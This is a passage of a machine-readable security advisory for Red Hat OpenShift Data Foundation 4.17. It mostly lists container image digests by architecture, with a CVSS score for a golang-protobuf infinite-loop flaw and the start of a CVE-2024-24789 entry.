"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON", }, { cve: "CVE-2024-24789", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2024-06-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", 